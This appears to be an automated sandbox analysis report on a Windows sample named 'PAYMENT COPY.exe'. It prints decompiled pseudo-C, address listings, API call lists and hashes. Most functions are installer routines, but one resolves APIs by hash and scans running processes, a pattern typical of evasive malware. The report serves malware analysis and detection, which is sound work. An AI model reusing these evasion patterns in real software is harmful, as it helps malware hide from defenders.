                                                                    0x73582184
                                                                    0x73582184
                                                                    0x73582172
                                                                    0x7358216b
                                                                    0x7358215a
                                                                    0x7358218a
                                                                    0x7358218d
                                                                    0x73582197
                                                                    0x7358219f
                                                                    0x735821ab
                                                                    0x735821b1
                                                                    0x735821b4
                                                                    0x735820e6
                                                                    0x735820e6
                                                                    0x00000000
                                                                    0x735820e6
                                                                    0x735821ba
                                                                    0x735821c0
                                                                    0x735821c0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x735821c2
                                                                    0x735821c2
                                                                    0x735821c2
                                                                    0x735821c2
                                                                    0x00000000
                                                                    0x7358218f
                                                                    0x7358218f
                                                                    0x73582195
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x73582195
                                                                    0x7358218d
                                                                    0x73582125
                                                                    0x7358212b
                                                                    0x7358212d
                                                                    0x73582133
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x73582133
                                                                    0x735820f9
                                                                    0x73582100
                                                                    0x73582106
                                                                    0x7358210c
                                                                    0x00000000
                                                                    0x7358210c
                                                                    0x73581d32
                                                                    0x73581d33
                                                                    0x735820d0
                                                                    0x735820d0
                                                                    0x735820d6
                                                                    0x735820d9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x735820e0
                                                                    0x735820e5
                                                                    0x00000000
                                                                    0x735820e5
                                                                    0x73581d3a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x73581d40
                                                                    0x73581d40
                                                                    0x73581d49
                                                                    0x73581d4e
                                                                    0x73581d54
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x73581d5a
                                                                    0x73581d67
                                                                    0x73581d6d
                                                                    0x73581d77
                                                                    0x73581d7d
                                                                    0x73581d85
                                                                    0x73581d95
                                                                    0x00000000
                                                                    0x73581d95

                                                                    APIs
                                                                      • Part of subcall function 73581215: GlobalAlloc.KERNEL32(00000040,73581233,?,735812CF,-7358404B,735811AB,-000000A0), ref: 7358121D
                                                                    • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 73581BC4
                                                                    • lstrcpyA.KERNEL32(00000008,?), ref: 73581C0C
                                                                    • lstrcpyA.KERNEL32(00000408,?), ref: 73581C16
                                                                    • GlobalFree.KERNEL32 ref: 73581C29
                                                                    • GlobalFree.KERNEL32 ref: 73581D09
                                                                    • GlobalFree.KERNEL32 ref: 73581D0E
                                                                    • GlobalFree.KERNEL32 ref: 73581D13
                                                                    • GlobalFree.KERNEL32 ref: 73581EFA
                                                                    • lstrcpyA.KERNEL32(?,?), ref: 73582098
                                                                    • GetModuleHandleA.KERNELBASE(00000008), ref: 73582114
                                                                    • LoadLibraryA.KERNELBASE(00000008), ref: 73582125
                                                                    • GetProcAddress.KERNEL32(?,?), ref: 7358217E
                                                                    • lstrlenA.KERNEL32(00000408), ref: 73582198
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.242471104.0000000073581000.00000020.00020000.sdmp, Offset: 73580000, based on PE: true
                                                                    • Associated: 00000000.00000002.242447030.0000000073580000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242513496.0000000073583000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242533114.0000000073585000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                    • String ID:
                                                                    • API String ID: 245916457-0
                                                                    • Opcode ID: a0220f367de9024a21c262bfaddf59bd92825b3c9ba3e2ce5e46dc4b5c99ed06
                                                                    • Instruction ID: 362c33506ee8cdfa3fb2063604eed79d345386c0949c74af5702edd202d66405
                                                                    • Opcode Fuzzy Hash: a0220f367de9024a21c262bfaddf59bd92825b3c9ba3e2ce5e46dc4b5c99ed06
                                                                    • Instruction Fuzzy Hash: E1228971D0424ADFDB129FA8E9817EDBBF5FB05305F24892ED197E2280DB749681CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405A15, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159filestringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 98%
                                                                    			E00405A15(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405CD3(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4e8 =  *0x42f4e8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040624D(0x42b8c0, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C2C(_t73);
					} else {
						lstrcatA(0x42b8c0, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x42b8c0,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405C10( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E0040624D(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004059CD(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00405374(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4e8 =  *0x42f4e8 + 1;
										} else {
											E00405374(0xfffffff1, _t73);
											E0040602C(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405A15(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b8c0 - 0x5c;
					if( *0x42b8c0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E004065C1(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BE5(_t73);
							_t40 = E004059CD(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00405374(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00405374(0xfffffff1, _t73);
							return E0040602C(_t72, _t73, 0);
						}
						L33:
						 *0x42f4e8 =  *0x42f4e8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                                                    0x00405a1f
                                                                    0x00405a24
                                                                    0x00405a2d
                                                                    0x00405a30
                                                                    0x00405a38
                                                                    0x00405a3b
                                                                    0x00405a3e
                                                                    0x00405a46
                                                                    0x00405a48
                                                                    0x00405a49
                                                                    0x00000000
                                                                    0x00405a49
                                                                    0x00405a54
                                                                    0x00405a57
                                                                    0x00405a57
                                                                    0x00405a57
                                                                    0x00405a5b
                                                                    0x00405a6e
                                                                    0x00405a75
                                                                    0x00405a7a
                                                                    0x00405a7e
                                                                    0x00405a8e
                                                                    0x00405a80
                                                                    0x00405a86
                                                                    0x00405a86
                                                                    0x00405a93
                                                                    0x00405a96
                                                                    0x00405aa1
                                                                    0x00405aa7
                                                                    0x00405aac
                                                                    0x00405abc
                                                                    0x00405abe
                                                                    0x00405ac4
                                                                    0x00405ac7
                                                                    0x00405aca
                                                                    0x00405b82
                                                                    0x00405b82
                                                                    0x00405b86
                                                                    0x00405b88
                                                                    0x00405b88
                                                                    0x00405b88
                                                                    0x00405b88
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405ad0
                                                                    0x00405ad0
                                                                    0x00405ad9
                                                                    0x00405adf
                                                                    0x00405ae4
                                                                    0x00405ae7
                                                                    0x00405ae9
                                                                    0x00405aed
                                                                    0x00405aef
                                                                    0x00405aef
                                                                    0x00405aed
                                                                    0x00405af2
                                                                    0x00405af5
                                                                    0x00405b08
                                                                    0x00405b0a
                                                                    0x00405b0f
                                                                    0x00405b16
                                                                    0x00405b31
                                                                    0x00405b36
                                                                    0x00405b38
                                                                    0x00405b5c
                                                                    0x00405b3a
                                                                    0x00405b3a
                                                                    0x00405b3d
                                                                    0x00405b51
                                                                    0x00405b3f
                                                                    0x00405b42
                                                                    0x00405b4a
                                                                    0x00405b4a
                                                                    0x00405b3d
                                                                    0x00405b18
                                                                    0x00405b1e
                                                                    0x00405b20
                                                                    0x00405b26
                                                                    0x00405b26
                                                                    0x00405b20
                                                                    0x00000000
                                                                    0x00405b16
                                                                    0x00405af7
                                                                    0x00405afa
                                                                    0x00405afc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405afe
                                                                    0x00405b00
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405b02
                                                                    0x00405b06
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405b61
                                                                    0x00405b6b
                                                                    0x00405b71
                                                                    0x00405b71
                                                                    0x00405b7c
                                                                    0x00000000
                                                                    0x00405b7c
                                                                    0x00405a98
                                                                    0x00405a9f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405a5d
                                                                    0x00405a5d
                                                                    0x00405a5f
                                                                    0x00405b8c
                                                                    0x00405b8e
                                                                    0x00405b91
                                                                    0x00405be2
                                                                    0x00405be2
                                                                    0x00405be2
                                                                    0x00405b93
                                                                    0x00405b96
                                                                    0x00405ba1
                                                                    0x00405ba6
                                                                    0x00405ba8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405bab
                                                                    0x00405bb7
                                                                    0x00405bbc
                                                                    0x00405bbe
                                                                    0x00000000
                                                                    0x00405bd9
                                                                    0x00405bc0
                                                                    0x00405bc3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405bc8
                                                                    0x00000000
                                                                    0x00405bcf
                                                                    0x00405b98
                                                                    0x00405b98
                                                                    0x00000000
                                                                    0x00405b98
                                                                    0x00405a65
                                                                    0x00405a68
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405a68

                                                                    APIs
                                                                    • DeleteFileA.KERNELBASE(?,?,76D7FA90,76D7F560,00000000), ref: 00405A3E
                                                                    • lstrcatA.KERNEL32(0042B8C0,\*.*,0042B8C0,?,?,76D7FA90,76D7F560,00000000), ref: 00405A86
                                                                    • lstrcatA.KERNEL32(?,0040A014,?,0042B8C0,?,?,76D7FA90,76D7F560,00000000), ref: 00405AA7
                                                                    • lstrlenA.KERNEL32(?,?,0040A014,?,0042B8C0,?,?,76D7FA90,76D7F560,00000000), ref: 00405AAD
                                                                    • FindFirstFileA.KERNEL32(0042B8C0,?,?,?,0040A014,?,0042B8C0,?,?,76D7FA90,76D7F560,00000000), ref: 00405ABE
                                                                    • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6B
                                                                    • FindClose.KERNEL32(00000000), ref: 00405B7C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                    • String ID: "C:\Users\user\Desktop\PAYMENT COPY.exe" $\*.*
                                                                    • API String ID: 2035342205-2760796988
                                                                    • Opcode ID: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
                                                                    • Instruction ID: d18931d2cc373ca10ddd825d8c89070702ac43f2d06cec063aa43078d7fd9c24
                                                                    • Opcode Fuzzy Hash: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
                                                                    • Instruction Fuzzy Hash: EB51AE30900A08AADF21AB258C85BAF7B78DF42714F14417BF841761D1D77CA982DE69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 72C34239, Relevance: 4.6, APIs: 3, Instructions: 52processCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E72C34239(void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v544;
				void* _v580;
				struct tagPROCESSENTRY32W* _t25;

				_v8 = E72C345A0();
				_v16 = E72C34648(_v8, 0xea31d3b6);
				_v20 = E72C34648(_v8, 0x5c7bf6e9);
				_v24 = E72C34648(_v8, 0x873d1860);
				_v12 = CreateToolhelp32Snapshot(2, 0);
				if(_v12 != 0xffffffff) {
					_v580 = 0x22c;
					_t25 =  &_v580;
					Process32FirstW(_v12, _t25);
					if(_t25 != 0) {
						while(E72C341F5( &_v544) != _a4) {
							if(Process32NextW(_v12,  &_v580) != 0) {
								continue;
							}
							return 0;
						}
						return 1;
					}
					return 0;
				}
				return 0;
			}











                                                                    0x72c34247
                                                                    0x72c34257
                                                                    0x72c34267
                                                                    0x72c34277
                                                                    0x72c34281
                                                                    0x72c34288
                                                                    0x72c3428e
                                                                    0x72c34298
                                                                    0x72c342a2
                                                                    0x72c342a7
                                                                    0x72c342ad
                                                                    0x72c342d2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x72c342d4
                                                                    0x00000000
                                                                    0x72c342c0
                                                                    0x00000000
                                                                    0x72c342a9
                                                                    0x00000000

                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 72C3427E
                                                                    • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 72C342A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.242406987.0000000072C33000.00000040.00020000.sdmp, Offset: 72C30000, based on PE: true
                                                                    • Associated: 00000000.00000002.242369499.0000000072C30000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242381961.0000000072C31000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242396929.0000000072C32000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242433913.0000000072C35000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 2353314856-0
                                                                    • Opcode ID: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
                                                                    • Instruction ID: a1c8fd499dc84748c409518fe7bd68d9f2353e9a0279cc6b62bff42ed8fb8885
                                                                    • Opcode Fuzzy Hash: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
                                                                    • Instruction Fuzzy Hash: 8C112A34D1010DBFDB23EFB4CC48AADBAB9FF25300F9049A5E915FA151E7314A619B52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004065C1, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004065C1(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c108); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c108;
			}




                                                                    0x004065cc
                                                                    0x004065d5
                                                                    0x00000000
                                                                    0x004065e2
                                                                    0x004065d8
                                                                    0x00000000

                                                                    APIs
                                                                    • FindFirstFileA.KERNELBASE(76D7FA90,0042C108,0042BCC0,00405D16,0042BCC0,0042BCC0,00000000,0042BCC0,0042BCC0,76D7FA90,?,76D7F560,00405A35,?,76D7FA90,76D7F560), ref: 004065CC
                                                                    • FindClose.KERNEL32(00000000), ref: 004065D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
                                                                    • Instruction ID: 5989989b5290daefe0063212e93516784f0ef67bd1aed84395a1ba9114d6aba9
                                                                    • Opcode Fuzzy Hash: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
                                                                    • Instruction Fuzzy Hash: 1BD01231508130ABC7455B387D4C85B7A98AF153317618A37F466F12E4C734CC228698
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403A60, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 96%
                                                                    			E00403A60(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f454;
				_t17 = E00406656(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a8b8;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E00406134(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a8b8, 0);
					__eflags =  *0x42a8b8;
					if(__eflags == 0) {
						E00406134(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a8b8, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E004061AB("1033",  *_t17() & 0x0000ffff);
				}
				E00403D25(_t71, _t84);
				_t80 = "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp";
				 *0x42f4e0 =  *0x42f45c & 0x00000020;
				 *0x42f4fc = 0x10000;
				if(E00405CD3(_t84, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405CD3(_t92, _t80) == 0) {
						E004062E0(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42f440, 0x67, 1, 0, 0, 0x8040);
					 *0x42ec28 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403D25(_t71, __eflags);
							__eflags =  *0x42f500;
							if( *0x42f500 != 0) {
								_t28 = E00405446(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ec0c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a898, 5); // executed
							_t34 = E004065E8("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E004065E8("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42ebe0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42ebe0);
								 *0x42ec04 = _t81;
								RegisterClassA(0x42ebe0);
							}
							_t36 =  *0x42ec20; // 0x0
							_t39 = DialogBoxParamA( *0x42f440, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DFD, 0); // executed
							E004039B0(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f440;
						 *0x42ebe4 = E00401000;
						 *0x42ebf0 =  *0x42f440;
						 *0x42ebf4 = _t25;
						 *0x42ec04 = 0x40a210;
						if(RegisterClassA(0x42ebe0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a898 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f440, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3e0;
					E00406134(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f498, 0x42e3e0, 0);
					_t57 =  *0x42e3e0; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3e1;
						 *((char*)(E00405C10(0x42e3e1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E0040624D(_t80, E00405BE5(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405C2C(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                    0x00403a66
                                                                    0x00403a6f
                                                                    0x00403a76
                                                                    0x00403a78
                                                                    0x00403a8c
                                                                    0x00403a9e
                                                                    0x00403aa5
                                                                    0x00403aac
                                                                    0x00403ab2
                                                                    0x00403ab7
                                                                    0x00403abd
                                                                    0x00403ad0
                                                                    0x00403ad0
                                                                    0x00403adb
                                                                    0x00403a7a
                                                                    0x00403a85
                                                                    0x00403a85
                                                                    0x00403ae0
                                                                    0x00403aea
                                                                    0x00403af3
                                                                    0x00403af8
                                                                    0x00403b09
                                                                    0x00403b90
                                                                    0x00403b98
                                                                    0x00403ba1
                                                                    0x00403ba1
                                                                    0x00403bb7
                                                                    0x00403bbd
                                                                    0x00403bcb
                                                                    0x00403c4c
                                                                    0x00403c54
                                                                    0x00403c5e
                                                                    0x00403c63
                                                                    0x00403c69
                                                                    0x00403cf3
                                                                    0x00403cf8
                                                                    0x00403cfa
                                                                    0x00403d16
                                                                    0x00000000
                                                                    0x00403d16
                                                                    0x00403cfc
                                                                    0x00403d02
                                                                    0x00403d0a
                                                                    0x00403d0a
                                                                    0x00000000
                                                                    0x00403d02
                                                                    0x00403c77
                                                                    0x00403c82
                                                                    0x00403c87
                                                                    0x00403c89
                                                                    0x00403c90
                                                                    0x00403c90
                                                                    0x00403c9b
                                                                    0x00403ca3
                                                                    0x00403ca5
                                                                    0x00403ca7
                                                                    0x00403cb0
                                                                    0x00403cb3
                                                                    0x00403cb9
                                                                    0x00403cb9
                                                                    0x00403cbf
                                                                    0x00403cd8
                                                                    0x00403ce9
                                                                    0x00000000
                                                                    0x00403cee
                                                                    0x00403c56
                                                                    0x00403c58
                                                                    0x00000000
                                                                    0x00403bcd
                                                                    0x00403bcd
                                                                    0x00403bd9
                                                                    0x00403be3
                                                                    0x00403be9
                                                                    0x00403bee
                                                                    0x00403bfd
                                                                    0x00403d1b
                                                                    0x00403d1b
                                                                    0x00000000
                                                                    0x00403d1b
                                                                    0x00403c0c
                                                                    0x00403c47
                                                                    0x00000000
                                                                    0x00403c47
                                                                    0x00403b0f
                                                                    0x00403b0f
                                                                    0x00403b12
                                                                    0x00403b14
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403b1e
                                                                    0x00403b2e
                                                                    0x00403b33
                                                                    0x00403b3a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403b3e
                                                                    0x00403b40
                                                                    0x00403b4d
                                                                    0x00403b4d
                                                                    0x00403b55
                                                                    0x00403b5b
                                                                    0x00403b83
                                                                    0x00403b8b
                                                                    0x00000000
                                                                    0x00403b6d
                                                                    0x00403b6e
                                                                    0x00403b77
                                                                    0x00403b7d
                                                                    0x00403b7e
                                                                    0x00000000
                                                                    0x00403b7e
                                                                    0x00403b79
                                                                    0x00403b7b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403b7b
                                                                    0x00403b5b

                                                                    APIs
                                                                      • Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                      • Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                                    • lstrcatA.KERNEL32(1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,76D7FA90,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT COPY.exe" ,00000000), ref: 00403ADB
                                                                    • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user~1\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,76D7FA90), ref: 00403B50
                                                                    • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user~1\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
                                                                    • GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
                                                                    • LoadImageA.USER32 ref: 00403BB7
                                                                      • Part of subcall function 004061AB: wsprintfA.USER32 ref: 004061B8
                                                                    • RegisterClassA.USER32 ref: 00403BF4
                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C0C
                                                                    • CreateWindowExA.USER32 ref: 00403C41
                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403C77
                                                                    • GetClassInfoA.USER32 ref: 00403CA3
                                                                    • GetClassInfoA.USER32 ref: 00403CB0
                                                                    • RegisterClassA.USER32 ref: 00403CB9
                                                                    • DialogBoxParamA.USER32 ref: 00403CD8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
